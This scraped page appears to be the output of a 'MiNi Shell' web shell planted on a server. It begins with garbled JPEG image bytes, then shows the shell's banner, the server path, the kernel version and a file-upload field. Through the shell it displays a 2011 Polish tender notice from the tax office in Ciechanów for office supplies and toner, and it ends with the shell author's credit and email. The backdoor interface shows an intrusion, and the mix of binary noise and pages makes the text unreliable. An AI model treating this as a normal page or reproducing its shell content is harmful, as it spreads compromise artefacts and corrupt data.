JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111128/400596-N-2011.html

<p class="kh_header"><b>Ciechanów: Dostawa artykułów biurowych, papieru kserograficznego, materiałów eksploatacyjnych   dla Urzędu Skarbowego w Ciechanowie</b><br>
<b>Numer ogłoszenia: 400596 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w  Ciechanowie , ul. Warszawska 58, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723538, 6724439 w. 221, faks 023 6723538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.is.waw.pl/usciechanow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, papieru kserograficznego, materiałów eksploatacyjnych   dla Urzędu Skarbowego w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest jednorazowa dostawa artykułów biurowych, papieru kserograficznego, materiałów eksploatacyjnych  dla Urzędu Skarbowego w Ciechanowie.

Artykuły biurowe:
Papier ksero A4, gramatura 80g/m2, białość min. CIE 160- 590 ryz;
Papier ksero A3, gramatura 80g/m2, białość min. CIE 160 - 20 ryz;
Blok z makulatury, wydzierany w kratkę, A5 (96-kartkowy)- 50 szt.;
Blok z makulatury, wydzierany w kratkę, A4 (96-kartkowy)- 50 szt;.
Papier komputerowy 375 x 12cali bez kopii (karton - około 1000 szt.)- 2 kartony;
Kieszeń bezbarwna, przezroczysta A4, pakowana po 100szt- 30 op;
Przekazy pocztowe, papier ciągły do drukarki - 10000 szt;.
Koperta biała, samoprzylepna B4 - 750 szt.;
Koperta biała, samoprzylepna B5 -2000 szt.;
Koperta biała, samoprzylepna C6- 3000 szt.;
Koperta biała, samoprzylepna C6 z oknem prawy dół- 2000 szt.;
Koperta biała, samoprzylepna 110x220 z oknem prawy dół-8000 szt.;
Koperta biała, samoprzylepna 110x220 - 2000 szt.;
Polecenie wyjazdu służbowego (delegacje) os-232 A5 w bloczku po 100 kartek	-5bl.;
Karteczki samoprzylepne w bloczku o wym. 76x76 mm- 100 bl.;
Karteczki samoprzylepne w bloczku o wym. 51x38 mm-20 bl.;
Teczka wiązana A4, z kartonu 275 g/m2 -5150 szt;.
Skoroszyt zwykły biały A4, z kartonu 275 g/m2 - 2000 szt.;
Skoroszyt oczkowy biały A4, z kartonu 275 g/m2- 200 szt.;
Skoroszyt plastikowy miękki, A4, z tylną okładką kolorową z przodu z przezroczystą- 20 szt;
Zeszyt A5 32K, kratka - 40 szt.;
Zeszyt A5 60K, kratka - 40 szt.;
Zeszyt A4 96K, kratka, oprawa twarda- 30 szt.;
Taśma pakowa szara o wymiarach 48mm x 50mm-2 szt.;
Taśma bezbarwna, samoprzylepna 18x20mm-82 szt.;
Księga druków ścisłego zarachowania A4- 2szt.;
Etykiety samoprzylepne na rolce o wymiarach 50mm x 30mm, do drukarki typu TLP 2844 -1000 szt.;
Wkład do długopisu typu PENTEL BK 101, kolor czerwony (wkład kompatybliny z pozycją 34)- 24 szt.;
Wkład do długopisu typu PENTEL BK 101, kolor niebieski (wkład kompatybliny z pozycją 34)	- 180 szt.;
Wkład do długopisu typu PENTEL BK 101 , kolor czarny (wkład kompatybliny z pozycją 34)- 70 szt.;
Mazak czarny- 20 szt;
Zakreślacz żółty -60 szt;
Długopis na sprężynce -  możliwość przymocowania długopisu do podłoża, samoprzylepny, sprężynka rozciągliwa, wymienny wkład, ustawienie  długopisu w przylepcu w pozycji pionowej - 50 szt.;
Długopis typu Pentel BK- 101 lub  podobny z gumowym uchwytem, wymiennym wkładem, kolor wkładu niebieski - 150 szt.;
Wkład krótki, kolor niebieski - 40 szt.;
Wkład niebieski do pióra kulkowego typu Parker  - 20 szt.;
Wkład typu UMR-87, żelowy, niebieski 0,7 mm do pióra typu LANCELOT - 10 szt;.
Ołówek z gumką wykonany z żywicy syntetycznej, z niełamliwym grafitem - 110 szt;.
Spinacz krzyżowy - 10 op.;
Spinacz okrągły R28- 50 op.;
Spinacz okrągły R50 -20 op.;
Zszywki 24/6 -50 op.;
Klipsy do papieru, wykonane z metalu, 51mm -10 op.;
Klipsy do papieru, wykonane z metalu, 32mm - 10 op.;
Klipsy do papieru, wykonane z metalu, 19mm -10 op.;
Segregator A4, szer. 75mm, z metalowymi okuciami na krawędziach dolnych - 120 szt.;
Gumka ołówkowa do stosowania na papierze - 20 szt.;
Gumki recepturki opakowanie - 1 kg - 2 op.;
Klej biurowy w sztyfcie do klejenia papieru i tektury, op. 22g - 3 szt.;
Tusz do stempli gumowych, czerwony, buteleczka 25 ml -60 szt.;
Rozszywacz do zszywek 24/6 - 10 szt.;
Zszywacz zszywający min.15 kartek - 24/6 - 10 szt.;
Dziurkacz metalowy  z ogranicznikiem formatu na 2 dziurki, dziurkowanie do 40 kartek	- 10szt.;
Marker do opisywania  płyt CD/DVD, linia pisania 0,4mm, kolor czarny- 1szt.;
Pióro kulkowe typu PARKER lub równoważne, kolor i wzór do uzgodnienia z Zamawiającym - 2szt.;
Wezwanie do uzgodnienia kont, bloczek A5 -5 bl.;
Matryca do Risographu FR 3950 EP - 1 szt;.
Płyty DVD-R  w pudełkach typu slim - 20 szt.;


Materiały eksploatacyjne:
Wkład atramentowy czarny - HP 56 (C6656AE)  wymagana min. ilość wyd. str. przy 5% zadruku strony - 520 do Drukarki HP DJ 5550/5652 - 2 szt.
Wkład z tonerem o zwiększonej pojemności - HP Q7551X (51X) wymagana min. ilość wyd. str. przy 5% zadruku strony-13000 do Drukarki HP LJ 3005DN - 3 szt.
Wkład z tonerem o zwiększonej pojemności - HP C8061X (61X) wymagana min. ilość wyd. str. przy 5% zadruku strony -10000 do Drukarki HP LJ 4100DN -1 szt.
Wkład z tonerem - ML-2150D8 wymagana min. ilość wyd. str. przy 5% zadruku strony -8000 do Drukarki Samsung ML-2151DN -2 szt.
Wkład z tonerem o zwiększonej pojemności - ML-D3050B wymagana min. ilość wyd. str. przy 5% zadruku strony -8000 do Drukarki Samsung ML-3051DN - 3 szt.
Wkład z tonerem o zwiększonej pojemności - 106R01246 wymagana min. ilość wyd. str. przy 5% zadruku strony -8000 do Drukarki XEROX Phaser 3428 -3 szt.
Wkład z tonerem - TK-310 wymagana min. ilość wyd. str. przy 5% zadruku strony -12000 do Drukarki KYOCERA FS-2000DN -4 szt.
Wkład z tonerem o zwiększonej pojemności - MLT-D2092L wymagana min. ilość wyd. str. przy 5% zadruku strony -5000 do Drukującego urządzenia wielofunkcyjnego Samsung SCX-4828FN -12 szt.
Wkład z tonerem o zwiększonej pojemności - SCX-D5530B wymagana min. ilość wyd. str. przy 5% zadruku strony -8000 do Drukującego urządzenia wielofunkcyjnego Samsung SCX-5530FN - 3 szt.
Pas transmisyjny CLP-T660B wymagana min. ilość wyd. str. przy 5% zadruku strony - 50000 do Drukującego urządzenia wielofunkcyjnego Samsung CLX-6240FX -1 szt.
Wkład z tonerem czarnym  o zwiększonej pojemności - CLP-K660B wymagana min. ilość wyd. str. przy 5% zadruku strony -5500 do Drukującego urządzenia wielofunkcyjnego Samsung CLX-6240FX - 1 szt.
Wkład z tonerem niebieskim - CLP-C660A wymagana min. ilość wyd. str. przy 5% zadruku strony - 2000 do Drukującego urządzenia wielofunkcyjnego Samsung CLX-6240FX -1 szt.
Wkład z tonerem czerwonym - CLP-M660A wymagana min. ilość wyd. str. przy 5% zadruku strony -2000 do Drukującego urządzenia wielofunkcyjnego Samsung CLX-6240FX - 1 szt.
Wkład z tonerem żółtym - CLP-Y660A wymagana min. ilość wyd. str. przy 5% zadruku strony -2000 do Drukującego urządzenia wielofunkcyjnego Samsung CLX-6240FX -1 szt.
 Wkład z tonerem - 106R01305 wymagana min. ilość wyd. str. przy 5% zadruku strony -30000 do Drukującego urządzenia wielofunkcyjnego XEROX WorkCentre 5230V - 2 szt.
 Print Cartrige (bęben) wysokowydajny - 101R00435 wymagana min. ilość wyd. str. przy 5% zadruku strony -80000 do Drukującego urządzenia wielofunkcyjnego XEROX WorkCentre 5230V - 1 szt.
Farba czarna do Risographu FR 3950 EP - 2 szt.
Toner AR-270T czarny wymagana min. ilość wyd. str. przy 5% zadruku strony - 25000 do Kserokopiarki Sharp AR-M236 - 1 szt.


Wymienione w jakiejkolwiek części opisu przedmiotu zamówienia nazwy, marki wyrobów, nie są obligatoryjne dla Wykonawców. Wykonawca ma prawo do zaoferowania innych wyrobów pod warunkiem zapewnienia parametrów technicznych, co najmniej identycznych   z parametrami wyrobów wymienionymi w opisie przedmiotu zamówienia.
Wskazane w opisie przedmiotu zamówienia numery katalogowe materiałów eksploatacyjnych producentów urządzeń mają na celu jedynie umożliwienie Wykonawcom prawidłowe zidentyfikowanie potrzeb Zamawiającego oraz określenie wymaganego standardu zamawianych artykułów i uniknięcie pomyłek.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do specyfikacji istotnych warunków zamówienia przedmiotowego postępowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.12.51.10-5, 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu  Zamawiający nie  wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej dwie dostawy materiałów biurowych i eksploatacyjnych o wartości co najmniej  20 000,00 zł brutto każda. Ocena spełniania w/w warunku udziału w postępowaniu  zostanie dokonana wg formuły:  spełnia - nie spełnia. Z treści złożonych dokumentów  wymaganych  w SIWZ musi wynikać jednoznacznie,  iż przedstawiony warunek Wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Zestawienie ilościowo - cenowe oferowanych artykułów biurowych, papieru kserograficznego, materiałów eksploatacyjnych dla Urzędu Skarbowego w Ciechanowie według wzoru stanowiącego załącznik nr 8 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wykonując dyspozycję art. 144 ust. 1 Ustawy przewiduje możliwość dokonania  zmiany wartości zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku urzędowej zmiany stawek podatku VAT. Zmianie ulegnie cena brutto przy zachowaniu dotychczasowej wartości netto. Zmiana zostanie dokonana w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.waw.pl/usciechanow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Ciechanowie ul. Warszawska 58 - pokój 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2011 godzina 12:00, miejsce: Oferty należy składać w siedzibie Urzędu Skarbowego w Ciechanowie ul. Warszawska  58  w pok. nr 105 - Sekretariat Urzędu, w godzinach 7:30-15:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com